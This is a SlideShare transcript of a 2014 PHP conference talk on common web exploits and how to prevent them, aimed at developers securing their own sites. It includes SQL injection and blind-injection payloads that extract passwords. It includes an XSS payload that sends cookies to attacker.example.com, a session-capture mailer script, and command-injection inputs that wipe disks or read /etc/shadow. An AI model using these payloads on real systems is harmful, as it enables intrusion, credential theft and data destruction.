SlideShare a Scribd company logo
1 of 54
Download to read offline
Hacking Sites for Fun and
Profit	
SkiPHP 2014
David Stockton
or How to Hack
Websites and Prevent
Your Site from Being
Hacked
or How I Learned to Stop Worrying
and Love the
SQL Injection
Web
What this is for
•

Learn how common exploits are
done and how to identify code
that is vulnerable

•

Learn how to fix code that is
susceptible to these attacks

•

Learn how to attack your own
code and your own sites so you
can fix them
What this is not for
•

Hacking or attacking sites
that you do not have
permission to attack
!

•

Don’t do it.
The Code
•

The code I am showing you is
similar to real code I’ve seen in
real projects, but it was written
specifically for this presentation.
Exploit 1:
•

SQL injection
!

•

select * from users where
username =
'$_POST['username']';
SQL Injection
•

$_POST['username'] = “' OR 1=1; --;”;
!
!

•

select * from users where username =
'' OR 1=1; --;';
SQL Injection
•

$_GET

•

$_POST

•

$_REQUEST
!

•

what else...
SQL Injection
•

$_COOKIE
!

•

values from the database
!

•

Some parts of $_SERVER
Errors can help attackers
•

Showing SQL errors can help attackers fix SQL injection
attempts

!
•

Other errors can help in other ways (some show
passwords)

!
•

Turn off display_errors in production, but log errors
always
Blind SQL injection
•

Make calls that take
varying amounts of time to
run. Use the time to
determine the answers to
questions about the
systems you are attacking.
Blind SQL injection
•

http://news.org/news.php?id=5

•

http://news.org/news.php?id=5 and 1=1

•

http://news.org/news.php?id=5 and 1=2
Determine DB version
•

news.php?id=5 and
substring(@@version,
1,1)=5
Subselects?

•

news.php?id=5 and
(select 1) = 1
Access to other databases/
tables
•

news.php?id=12 and
(select 1 from mysql.user
limit 0,1) = 1
Guessing tables
•

news.php?id=6 and
(select 1 from users
limit 0,1) =1
Guessing column names

•

news.php?id=11 and (select
substring(concat(1, password),1,1) from
users limit 0,1)=1
Guessing data
•

news.php?id=4 and
ascii(substring((SELECT concat(username,
0x3a, password) from users limit 0,1),
1,1))>80
!

•

Increment to guess values letter by letter
Preventing SQL Injection
●

mysql_real_escape_string

●

Prepared statements

●

Input validation and whitelists
Exploit 2:
•

XSS
!

•

Cross-site Scripting
What is it?
•

User supplied
code running in
the browser
So? It’s their browser
•

Yep, but it may not
be their code.
So? It’s their browser
•

It may not be your
code, but it might
call your code in a
way you don’t want
XSS Code
<img src=”<?php echo $_POST[‘image’];?>”>
<.. javascript to open the print dialog ..>
So what?
•

What if we post code into
$_POST[‘image’]
!

●

Steal session cookies

●

Call Javascript APIs to causes actions
on the server (CSRF)

●

Post forms as the user
The payload:
$_POST[‘image’]

/images/add.gif"><script type="text/
javascript">alert('xss!');</script><img
src="
Ermahgerd er perperp.
Ooh, that’s soooo malicious,
I’m totally shaking right now
•

Fine. How about this.
!
!

•

image = /images/add.gif"><script type="text/
javascript">document.write('<img src="http://
attacker.example.com/session.php?' +
document.cookie + '">'); </script><img src="
WTH did that do?
•

Javascript ran FROM the site
we’re attacking and it sent
your site cookies to a script
the attacker controls.
So you stole my cookie. So
what?
•

Here’s what.

<?php

$session = $_GET['PHPSESSID'];

$body = 'Got session: ' . $session;

mail('attackeremail@attacker.example.org',
'Session Captured', $body);
Oooh, you emailed my
cookie... So...
Now it’s my turn...
Why this matters
•

Sites identify and authenticate
users with session.

•

I have identified myself as you. I
am now logged in as you and
can do anything you can do on
the site.
Ok, so I can steal my own
session
•

Here’s how to use
it against someone.
The first part of the attack
•

Create an email to a link on the
attacking site that posts the code to the
site under attack. Send the email to the
victim.
!

•

They click the link, you steal their
session.
What else can I do?
•

Cross Site Request Forgery (CSRF)

•

Causing actions to happen on the user’s
behalf

•

Purchasing things, changing passwords,
creating accounts, etc.
How to prevent?
•

Escape output

•

Whitelist URLs, domains, input

•

Make the print page lookup and use image
paths from a trusted source (database
maybe?)
Prevent CSRF
•

Use a CSRF token.

•

Disallow requests
that don’t contain the
correct token.
Exploit prevention in
general
•

Filter input

•

Escape output

•

This works for SQL injection, XSS and
more...

•

in general
Exploit 3: Command
injection
●

shell_exec

●

exec

●

passthru

●

system

●

`some command`
PHP Web File Browser
•

Supposed to allow viewing of files within
the web directories

•

$files = shell_exec(‘ls -al ’ .
$_GET[‘dir’]);
What’s the danger?
•

$_GET[‘dir’] = ‘.; rm -rf / *’;

•

Or whatever.

•

cat /etc/passwd; cat /etc/shadow
How to prevent?
•

If you must use user input in a command,
use escapeshellarg()

•

$dir = escapeshellarg($_GET[‘dir’]);

•

$files = shell_exec(‘ls -al ‘ . $dir);

•

Validate that the input is allowed
Other types of injection
●

Code (eval)

●

Regex

●

Log

●

LDAP
Other exploits
●

Authentication / Session management

●

Information disclosure

●

Sensitive data exposure

●

File upload flaws

●

Unchecked redirects

●

Leftover debug code

●

Session fixation

●

Internal threats

●

Privacy Violation (password in logs,
etc)
Mitigation
•

Validation on the client
•

Reject invalid requests entirely, log
intrusion attempt

•

Principle of least privilege

•

Filter input, escape output
One more exploit
•

Session puzzling attack

•

http://bit.ly/1eO7jPK
Session Puzzling

•

Making requests to privileged and
unprivileged pages in a particular order
that can escalate privileges of the attacker
How it could work

•

Page requiring authentication looks for
‘user’ in session to determine
authentication
Session Puzzling

•

Login -> forgot password page sends
information via ‘user’ in session
Put it together
•

Hit pages quickly in this order:

•

Login -> forgot password / privileged page

•

Privileged page sees ‘user’ and allows
attacker in
How was this found?	

•

By accident, via web crawler getting
access to privileged pages
Questions?
•

Please rate this talk.

•

https://joind.in/10446

More Related Content

What's hot

Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web ApplicationsSasha Goldshtein
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git RepoCliff Smith
 
Joomla! security jday2015
Joomla! security jday2015Joomla! security jday2015
Joomla! security jday2015kriptonium
 
DefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application DefenseFrank Kim
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security VulnerabilitiesMarius Vorster
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache ShiroMarakana Inc.
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
The art of android hacking
The art of  android hackingThe art of  android hacking
The art of android hackingAbhinav Mishra
 

What's hot (20)

Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web Applications
 
Xss preso
Xss presoXss preso
Xss preso
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git Repo
 
Htaccess info
Htaccess infoHtaccess info
Htaccess info
 
Joomla! security jday2015
Joomla! security jday2015Joomla! security jday2015
Joomla! security jday2015
 
DefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysis
 
Hacking Wordpress Plugins
Hacking Wordpress PluginsHacking Wordpress Plugins
Hacking Wordpress Plugins
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security Vulnerabilities
 
Securing REST APIs
Securing REST APIsSecuring REST APIs
Securing REST APIs
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache Shiro
 
Web Security
Web SecurityWeb Security
Web Security
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
The art of android hacking
The art of  android hackingThe art of  android hacking
The art of android hacking
 

Similar to Hacking sites for fun and profit

Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profitDavid Stockton
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 
AOEconf17: Application Security - Bastian Ike
AOEconf17: Application Security - Bastian IkeAOEconf17: Application Security - Bastian Ike
AOEconf17: Application Security - Bastian IkeAOE
 
AOEconf17: Application Security
AOEconf17: Application SecurityAOEconf17: Application Security
AOEconf17: Application SecurityAOE
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow
 
OWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksMohamed Talaat
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenSqreen
 
Thoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecoreThoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecorePINT Inc
 
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격선협 이
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
Open source security
Open source securityOpen source security
Open source securitylrigknat
 

Similar to Hacking sites for fun and profit (20)

Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
AOEconf17: Application Security - Bastian Ike
AOEconf17: Application Security - Bastian IkeAOEconf17: Application Security - Bastian Ike
AOEconf17: Application Security - Bastian Ike
 
AOEconf17: Application Security
AOEconf17: Application SecurityAOEconf17: Application Security
AOEconf17: Application Security
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASP
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web Hacker
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
 
OWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacks
 
ruxc0n 2012
ruxc0n 2012ruxc0n 2012
ruxc0n 2012
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by Sqreen
 
Web Security
Web SecurityWeb Security
Web Security
 
Thoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecoreThoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for Sitecore
 
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
Open source security
Open source securityOpen source security
Open source security
 

More from David Stockton

Phone calls and sms from php
Phone calls and sms from phpPhone calls and sms from php
Phone calls and sms from phpDavid Stockton
 
The Art of Transduction
The Art of TransductionThe Art of Transduction
The Art of TransductionDavid Stockton
 
Using queues and offline processing to help speed up your application
Using queues and offline processing to help speed up your applicationUsing queues and offline processing to help speed up your application
Using queues and offline processing to help speed up your applicationDavid Stockton
 
Intermediate OOP in PHP
Intermediate OOP in PHPIntermediate OOP in PHP
Intermediate OOP in PHPDavid Stockton
 
Building APIs with Apigilty and Zend Framework 2
Building APIs with Apigilty and Zend Framework 2Building APIs with Apigilty and Zend Framework 2
Building APIs with Apigilty and Zend Framework 2David Stockton
 
Intermediate OOP in PHP
Intermediate OOP in PHPIntermediate OOP in PHP
Intermediate OOP in PHPDavid Stockton
 
Common design patterns in php
Common design patterns in phpCommon design patterns in php
Common design patterns in phpDavid Stockton
 
Intermediate oop in php
Intermediate oop in phpIntermediate oop in php
Intermediate oop in phpDavid Stockton
 
Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)David Stockton
 
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHTame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHDavid Stockton
 
Mercurial Distributed Version Control
Mercurial Distributed Version ControlMercurial Distributed Version Control
Mercurial Distributed Version ControlDavid Stockton
 
Regular expressions and php
Regular expressions and phpRegular expressions and php
Regular expressions and phpDavid Stockton
 

More from David Stockton (17)

Phone calls and sms from php
Phone calls and sms from phpPhone calls and sms from php
Phone calls and sms from php
 
The Art of Transduction
The Art of TransductionThe Art of Transduction
The Art of Transduction
 
Using queues and offline processing to help speed up your application
Using queues and offline processing to help speed up your applicationUsing queues and offline processing to help speed up your application
Using queues and offline processing to help speed up your application
 
Intermediate OOP in PHP
Intermediate OOP in PHPIntermediate OOP in PHP
Intermediate OOP in PHP
 
Building APIs with Apigilty and Zend Framework 2
Building APIs with Apigilty and Zend Framework 2Building APIs with Apigilty and Zend Framework 2
Building APIs with Apigilty and Zend Framework 2
 
API All the Things!
API All the Things!API All the Things!
API All the Things!
 
Intermediate OOP in PHP
Intermediate OOP in PHPIntermediate OOP in PHP
Intermediate OOP in PHP
 
Beginning OOP in PHP
Beginning OOP in PHPBeginning OOP in PHP
Beginning OOP in PHP
 
Common design patterns in php
Common design patterns in phpCommon design patterns in php
Common design patterns in php
 
Intermediate oop in php
Intermediate oop in phpIntermediate oop in php
Intermediate oop in php
 
Grokking regex
Grokking regexGrokking regex
Grokking regex
 
Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)
 
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHTame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
 
Mercurial Distributed Version Control
Mercurial Distributed Version ControlMercurial Distributed Version Control
Mercurial Distributed Version Control
 
Regular expressions and php
Regular expressions and phpRegular expressions and php
Regular expressions and php
 
PHP 5 Magic Methods
PHP 5 Magic MethodsPHP 5 Magic Methods
PHP 5 Magic Methods
 
FireBug And FirePHP
FireBug And FirePHPFireBug And FirePHP
FireBug And FirePHP
 

Recently uploaded

IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoTAnalytics
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...FIDO Alliance
 
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...CzechDreamin
 
A Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyA Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyUXDXConf
 
Demystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John StaveleyDemystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John StaveleyJohn Staveley
 
Designing for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastDesigning for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastUXDXConf
 
IESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIES VE
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceSamy Fodil
 
Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024Enterprise Knowledge
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsUXDXConf
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeCzechDreamin
 
The Metaverse: Are We There Yet?
The  Metaverse:    Are   We  There  Yet?The  Metaverse:    Are   We  There  Yet?
The Metaverse: Are We There Yet?Mark Billinghurst
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxDavid Michel
 
Syngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdfSyngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdfSyngulon
 
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCustom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCzechDreamin
 
Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Patrick Viafore
 
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfFIDO Alliance
 
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...FIDO Alliance
 
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlPeter Udo Diehl
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfFIDO Alliance
 

Recently uploaded (20)

IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
 
A Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyA Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System Strategy
 
Demystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John StaveleyDemystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John Staveley
 
Designing for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastDesigning for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at Comcast
 
IESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIESVE for Early Stage Design and Planning
IESVE for Early Stage Design and Planning
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM Performance
 
Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering Teams
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
 
The Metaverse: Are We There Yet?
The  Metaverse:    Are   We  There  Yet?The  Metaverse:    Are   We  There  Yet?
The Metaverse: Are We There Yet?
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
Syngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdfSyngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdf
 
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCustom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
 
Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024
 
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
 
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...
 
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 

Hacking sites for fun and profit